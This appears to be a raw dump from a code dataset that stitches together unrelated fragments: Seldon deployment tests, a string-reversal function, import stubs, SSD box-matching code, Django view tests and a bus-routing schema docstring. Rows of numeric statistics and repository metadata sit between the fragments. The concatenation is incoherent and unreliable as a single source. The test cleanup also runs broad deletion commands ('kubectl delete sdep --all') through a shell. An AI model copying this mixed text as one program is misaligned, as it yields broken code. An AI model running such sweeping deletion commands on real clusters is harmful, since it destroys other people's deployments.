assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = rest_request_ambassador("myabtest",None,API_AMBASSADOR)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = grpc_request_ambassador2("myabtest",None,API_AMBASSADOR)
print(r)
r = grpc_request_api_gateway2("oauth-key","oauth-secret",None,rest_endpoint=API_GATEWAY_REST,grpc_endpoint=API_GATEWAY_GRPC)
print(r)
run('cd my-model && ks delete default -c myabtest && ks component rm myabtest', shell=True)
    # Test MAB test model ksonnet script with 4 API methods
def test_mab_model(self):
run('cd my-model && ks delete default && ks component rm mymab', shell=True)
run('kubectl delete sdep --all', shell=True)
run('cd my-model && ks generate seldon-mab-v1alpha2 mymab --imageA seldonio/mock_classifier:1.0 --imageB seldonio/mock_classifier:1.0 --oauthKey=oauth-key --oauthSecret=oauth-secret && ks apply default -c mymab', shell=True)
wait_for_rollout("mymab-mymab-41de5b8")
wait_for_rollout("mymab-mymab-b8038b2")
wait_for_rollout("mymab-mymab-df66c5c")
r = initial_rest_request()
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = rest_request_ambassador("mymab",None,API_AMBASSADOR)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = grpc_request_ambassador2("mymab",None,API_AMBASSADOR)
print(r)
r = grpc_request_api_gateway2("oauth-key","oauth-secret",None,rest_endpoint=API_GATEWAY_REST,grpc_endpoint=API_GATEWAY_GRPC)
print(r)
run('cd my-model && ks delete default && ks component rm mymab', shell=True)
| 50.481132 | 245 | 0.657073 | 720 | 5,351 | 4.709722 | 0.152778 | 0.053082 | 0.031849 | 0.050428 | 0.830434 | 0.784429 | 0.775877 | 0.775877 | 0.761722 | 0.730758 | 0 | 0.020525 | 0.216969 | 5,351 | 105 | 246 | 50.961905 | 0.788783 | 0.027658 | 0 | 0.617021 | 0 | 0.031915 | 0.320446 | 0.071552 | 0 | 0 | 0 | 0 | 0.12766 | 1 | 0.06383 | false | 0 | 0.06383 | 0 | 0.148936 | 0.12766 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
6a94a7cd3e89c26bee4c47c7741e5a37358da6ff
| 46 |
py
|
Python
|
Fundamentals/Reversed Strings.py
|
gnvidal/Codewars
|
117a83bd949a1503f31f1f915641e96e7bf7a04c
|
[
"MIT"
] | 49 |
2018-04-30T06:42:45.000Z
|
2021-07-22T16:39:02.000Z
|
Fundamentals/Reversed Strings.py
|
gnvidal/Codewars
|
117a83bd949a1503f31f1f915641e96e7bf7a04c
|
[
"MIT"
] | 1 |
2020-08-31T02:36:53.000Z
|
2020-08-31T10:14:00.000Z
|
Fundamentals/Reversed Strings.py
|
gnvidal/Codewars
|
117a83bd949a1503f31f1f915641e96e7bf7a04c
|
[
"MIT"
] | 36 |
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
def solution(string):
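    # Negative-step slicing walks the string from end to start, returning a
    # reversed copy in one step.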
return string[::-1]
| 15.333333 | 23 | 0.652174 | 6 | 46 | 5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.173913 | 46 | 2 | 24 | 23 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 |
0
| 6 |
0a8d1e23712a4b58170f56ad1d0354b9b57142a5
| 45 |
py
|
Python
|
AudioLib/__init__.py
|
yNeshy/voice-change
|
2535351bcd8a9f2d58fcbff81a2051c4f6ac6ab4
|
[
"MIT"
] | 11 |
2021-02-04T11:35:37.000Z
|
2022-03-26T10:32:00.000Z
|
AudioLib/__init__.py
|
yNeshy/voice-change
|
2535351bcd8a9f2d58fcbff81a2051c4f6ac6ab4
|
[
"MIT"
] | 4 |
2021-03-22T09:36:54.000Z
|
2021-03-26T09:10:51.000Z
|
AudioLib/__init__.py
|
yNeshy/voice-change
|
2535351bcd8a9f2d58fcbff81a2051c4f6ac6ab4
|
[
"MIT"
] | 6 |
2021-02-24T09:03:35.000Z
|
2021-11-16T02:00:53.000Z
|
from AudioLib.AudioEffect import AudioEffect
| 22.5 | 44 | 0.888889 | 5 | 45 | 8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0aab7620f824873c7b572e13e03aa334f91e254d
| 143 |
py
|
Python
|
axju/generic/__init__.py
|
axju/axju
|
de0b3d9c63b7cca4ed16fb50e865c159b4377953
|
[
"MIT"
] | null | null | null |
axju/generic/__init__.py
|
axju/axju
|
de0b3d9c63b7cca4ed16fb50e865c159b4377953
|
[
"MIT"
] | null | null | null |
axju/generic/__init__.py
|
axju/axju
|
de0b3d9c63b7cca4ed16fb50e865c159b4377953
|
[
"MIT"
] | null | null | null |
from axju.generic.basic import BasicWorker
from axju.generic.execution import ExecutionWorker
from axju.generic.template import TemplateWorker
| 35.75 | 50 | 0.874126 | 18 | 143 | 6.944444 | 0.555556 | 0.192 | 0.36 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083916 | 143 | 3 | 51 | 47.666667 | 0.954198 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0ad2792c4efbba79b47edb4a13bc47fda219fd40
| 48 |
py
|
Python
|
icarus/models/service/__init__.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 5 |
2021-03-20T09:22:55.000Z
|
2021-12-20T17:01:33.000Z
|
icarus/models/service/__init__.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1 |
2021-12-13T07:40:46.000Z
|
2021-12-20T16:59:08.000Z
|
icarus/models/service/__init__.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1 |
2021-11-25T05:42:20.000Z
|
2021-11-25T05:42:20.000Z
|
# -*- coding: utf-8 -*-
from .compSpot import *
| 16 | 23 | 0.583333 | 6 | 48 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.1875 | 48 | 2 | 24 | 24 | 0.692308 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0add3254851b32ab4bc7e1c39aca7cbe53d6398b
| 190 |
py
|
Python
|
votesim/benchmarks/__init__.py
|
johnh865/election_sim
|
b73b7e65f1bb22abb82cbe8442fcf02b0c20894e
|
[
"MIT"
] | 8 |
2019-10-21T23:24:51.000Z
|
2021-09-14T03:04:59.000Z
|
votesim/benchmarks/__init__.py
|
johnh865/election_sim
|
b73b7e65f1bb22abb82cbe8442fcf02b0c20894e
|
[
"MIT"
] | 2 |
2021-02-09T23:52:47.000Z
|
2021-02-10T04:08:35.000Z
|
votesim/benchmarks/__init__.py
|
johnh865/election_sim
|
b73b7e65f1bb22abb82cbe8442fcf02b0c20894e
|
[
"MIT"
] | 1 |
2019-10-21T23:32:18.000Z
|
2019-10-21T23:32:18.000Z
|
# from votesim.benchmarks.benchrunner import (
# run_benchmark,
# get_benchmarks,
# post_benchmark,
# plot_benchmark,
# )
from votesim.benchmarks import runtools, simple
| 23.75 | 47 | 0.705263 | 19 | 190 | 6.842105 | 0.631579 | 0.169231 | 0.323077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 190 | 8 | 47 | 23.75 | 0.866667 | 0.678947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
7c1199fad1c1f92e7be3b25334e3b5e42a47fbe5
| 6,633 |
py
|
Python
|
dl/models/ssd/modules/utils.py
|
jjjkkkjjj/pytorch.dl
|
d82aa1191c14f328c62de85e391ac6fa1b4c7ee3
|
[
"MIT"
] | 2 |
2021-02-06T22:40:13.000Z
|
2021-03-26T09:15:34.000Z
|
dl/models/ssd/modules/utils.py
|
jjjkkkjjj/pytorch.dl
|
d82aa1191c14f328c62de85e391ac6fa1b4c7ee3
|
[
"MIT"
] | 8 |
2020-07-11T07:10:51.000Z
|
2022-03-12T00:39:03.000Z
|
dl/models/ssd/modules/utils.py
|
jjjkkkjjj/pytorch.dl
|
d82aa1191c14f328c62de85e391ac6fa1b4c7ee3
|
[
"MIT"
] | 2 |
2021-03-26T09:19:42.000Z
|
2021-07-27T02:38:09.000Z
|
import torch
from ....data.utils.boxes import centroids2corners, iou
def matching_strategy(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
    # number of class label columns: total width minus the 4 localization values (cx, cy, w, h)
class_num = targets[0].shape[1] - 4
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_conf = target[:, :4], target[:, 4:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get the maximum overlap value for each default box
# shape = (default box num,)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
# object_indices = object_indices.long()  # for fancy indexing
# get the maximum overlap value for each object
# shape = (object num,)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
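# force each object's best-matching default box to be assigned to that object,
# so every ground-truth box receives at least one candidate match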
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)  # ensure N != 0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 4:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
def matching_strategy_quads(targets, dboxes, **kwargs):
"""
:param targets: list of Tensors, one per image; each has shape (object num, 4=(cx,cy,w,h) + 8=(x1,y1,x2,y2,...) + class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that the coordinates are in (cx, cy, w, h) form
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). Indicates whether each default box matches an object (True) or background (False).
matched_targets: Tensor, shape = (batch, default box num, 4+8+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# subtract the 4 localization values (cx, cy, w, h) and the 8 quad corner values to get the number of class labels
class_num = targets[0].shape[1] - 4 - 8
# convert center-form coordinates to corner (min-max) coordinates
dboxes_mm = centroids2corners(dboxes)
# create the empty tensors to be returned
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty(
(batch_num, dboxes_num, 4 + 8 + class_num), device=device)
# match targets to default boxes for each image in the batch
for b, target in enumerate(targets):
targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get the maximum overlap value for each default box
# shape = (default box num,)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
# object_indices = object_indices.long()  # for fancy indexing
# get the maximum overlap value for each object
# shape = (object num,)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
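# as above: force each object's best default box to be matched to that object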
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)  # ensure N != 0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \
targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 12:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
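# --- Editor's addition: a minimal, hedged usage sketch for matching_strategy.
# All shapes and counts here (2 images, 100 default boxes, 20 object classes
# plus background) are illustrative assumptions, not values taken from this
# repository's configuration.
if __name__ == '__main__':
    class_num = 21  # assumed: 20 object classes + 1 background class
    # per-image targets: rows of (cx, cy, w, h) followed by class scores
    targets = [torch.rand(3, 4 + class_num), torch.rand(2, 4 + class_num)]
    dboxes = torch.rand(100, 4)  # default boxes in (cx, cy, w, h) form
    pos_indicator, matched_targets = matching_strategy(
        targets, dboxes, batch_num=len(targets), threshold=0.5)
    print(pos_indicator.shape)    # expected: torch.Size([2, 100])
    print(matched_targets.shape)  # expected: torch.Size([2, 100, 25])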
| 41.45625 | 174 | 0.673903 | 922 | 6,633 | 4.58243 | 0.127983 | 0.033136 | 0.031953 | 0.030296 | 0.962604 | 0.953136 | 0.942959 | 0.942959 | 0.942959 | 0.942959 | 0 | 0.017124 | 0.225237 | 6,633 | 159 | 175 | 41.716981 | 0.80502 | 0.306196 | 0 | 0.692308 | 0 | 0 | 0.01162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.038462 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
7c203ac0f48d46b7efacaa17d6e53845b02eb976
| 7,512 |
py
|
Python
|
cms/tests/test_views.py
|
Ibrahem3amer/bala7
|
70638c121ea85ff0e6a650c5f2641b0b3b04d6d0
|
[
"Apache-2.0"
] | null | null | null |
cms/tests/test_views.py
|
Ibrahem3amer/bala7
|
70638c121ea85ff0e6a650c5f2641b0b3b04d6d0
|
[
"Apache-2.0"
] | null | null | null |
cms/tests/test_views.py
|
Ibrahem3amer/bala7
|
70638c121ea85ff0e6a650c5f2641b0b3b04d6d0
|
[
"Apache-2.0"
] | null | null | null |
from django.core.urlresolvers import resolve
from django.urls import reverse
from django.test import TestCase, RequestFactory
from django.http import HttpRequest, Http404
from django.contrib.auth.models import User
from unittest import skip
from users.models import University, Faculty, Department, UserProfile
from cms.models import Topic
from cms.views import get_topic
class AccessRestriction(TestCase):
def setUp(self):
self.user = User.objects.create(username='test_username', email='tesssst@test.com', password='secrettt23455')
self.uni = University.objects.create(name='test_university')
self.fac = Faculty.objects.create(name='Test faculty')
self.dep = Department.objects.create(name='Test dep')
self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep)
self.topic = Topic.objects.create(name='cs', desc="test test test", faculty=self.fac, term=1)
self.topic.department.add(self.dep)
self.user.profile = self.profile
self.profile.topics.add(self.topic)
def test_return_topic_that_match_user(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
response = get_topic(request, self.dep.id, self.topic.id)
# Assert test
self.assertEqual(200, response.status_code)
def test_return_topic_that_has_different_department(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
another_dep = Department.objects.create()
try:
response = get_topic(request, another_dep.id, self.topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_does_not_exist(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
try:
response = get_topic(request, self.dep.id, 990)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_outside_user_topics(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request, self.dep.id, outsider_topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_get_topic_with_no_parameters(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
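# Editor's addition: a hedged sketch of the same 404 check written with
# assertRaises instead of the try/except flag pattern used above; the topic
# id 990 is assumed not to exist, as in test_return_topic_that_does_not_exist.
def test_return_topic_that_does_not_exist_with_assertraises(self):
    request = RequestFactory()
    request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
    request.user = self.user
    with self.assertRaises(Http404):
        get_topic(request, self.dep.id, 990)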
class TableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='tesssst@test.com', password='secrettt23455')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/table_main.html')
def test_page_redirect_on_post(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="secrettt23455")
# Exercise test
request = self.client.post(url)
# Assert test
self.assertEqual(302, request.status_code)
def test_page_redirect_on_no_profile(self):
# Setup test
user = User.objects.create_user(
username='test_username',
email='tesssst@test.com',
password='secrettt23455'
)
url = reverse('web_dep_table')
request = self.client.login(username="test_username", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(302, request.status_code)
class UserTableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='tesssst@test.com', password='secrettt23455')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1)
self.topic.department.add(self.dep)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_user_table')
request = self.client.login(username="ssss", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_page_load_if_no_profile(self):
# Setup test
url = reverse('web_user_table')
another_user = User.objects.create_user(username='xxxss', email='tesssst@test.com', password='secrettt23455')
request = self.client.login(username="xxxss", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_post_when_no_choices(self):
# Setup test
url = reverse('web_user_table')
data = {}
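# NOTE (editor): setUp for this class creates only user 'ssss', so this
# 'xxxss' login is expected to fail and the POST below is made anonymously;
# the asserted 302 is then presumably the login redirect.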
request = self.client.login(username="xxxss", password="secrettt23455")
# Exercise test
request = self.client.post(url, data=data)
# Assert test
self.assertEqual(302, request.status_code)
| 36.823529 | 117 | 0.651092 | 914 | 7,512 | 5.221007 | 0.12035 | 0.059933 | 0.042749 | 0.01907 | 0.836337 | 0.774728 | 0.741199 | 0.733655 | 0.683152 | 0.624686 | 0 | 0.017413 | 0.23549 | 7,512 | 203 | 118 | 37.004926 | 0.813512 | 0.054047 | 0 | 0.618321 | 0 | 0 | 0.097426 | 0.009333 | 0 | 0 | 0 | 0 | 0.10687 | 1 | 0.10687 | false | 0.083969 | 0.068702 | 0 | 0.198473 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 6 |
7c2db7d1e1ec02302af64420555ad08513981b88
| 18,565 |
py
|
Python
|
tests/route_generator_test.py
|
CityPulse/dynamic-bus-scheduling
|
7516283be5a374fe0a27715f4facee11c847f39f
|
[
"MIT"
] | 14 |
2016-09-24T11:42:48.000Z
|
2021-06-11T08:06:23.000Z
|
tests/route_generator_test.py
|
CityPulse/CityPulse-Dynamic-Bus-Scheduler
|
7516283be5a374fe0a27715f4facee11c847f39f
|
[
"MIT"
] | 1 |
2016-07-08T09:16:42.000Z
|
2016-07-08T09:16:42.000Z
|
tests/route_generator_test.py
|
CityPulse/dynamic-bus-scheduling
|
7516283be5a374fe0a27715f4facee11c847f39f
|
[
"MIT"
] | 5 |
2016-06-17T12:46:28.000Z
|
2021-09-25T19:04:37.000Z
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
"""
- LICENCE
The MIT License (MIT)
Copyright (c) 2016 Eleftherios Anagnostopoulos for Ericsson AB (EU FP7 CityPulse Project)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
- DESCRIPTION OF DOCUMENTS
-- MongoDB Database Documents:
address_document: {
'_id', 'name', 'node_id', 'point': {'longitude', 'latitude'}
}
bus_line_document: {
'_id', 'bus_line_id', 'bus_stops': [{'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}}]
}
bus_stop_document: {
'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}
}
bus_stop_waypoints_document: {
'_id', 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[edge_object_id]]
}
bus_vehicle_document: {
'_id', 'bus_vehicle_id', 'maximum_capacity',
'routes': [{'starting_datetime', 'ending_datetime', 'timetable_id'}]
}
detailed_bus_stop_waypoints_document: {
'_id', 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[edge_document]]
}
edge_document: {
'_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'max_speed', 'road_type', 'way_id', 'traffic_density'
}
node_document: {
'_id', 'osm_id', 'tags', 'point': {'longitude', 'latitude'}
}
point_document: {
'_id', 'osm_id', 'point': {'longitude', 'latitude'}
}
timetable_document: {
'_id', 'timetable_id', 'bus_line_id', 'bus_vehicle_id',
'timetable_entries': [{
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'departure_datetime', 'arrival_datetime', 'number_of_onboarding_passengers',
'number_of_deboarding_passengers', 'number_of_current_passengers',
'route': {
'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
'distances_from_starting_node', 'times_from_starting_node',
'distances_from_previous_node', 'times_from_previous_node'
}
}],
'travel_requests': [{
'_id', 'client_id', 'bus_line_id',
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'departure_datetime', 'arrival_datetime',
'starting_timetable_entry_index', 'ending_timetable_entry_index'
}]
}
traffic_event_document: {
'_id', 'event_id', 'event_type', 'event_level', 'point': {'longitude', 'latitude'}, 'datetime'
}
travel_request_document: {
'_id', 'client_id', 'bus_line_id',
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
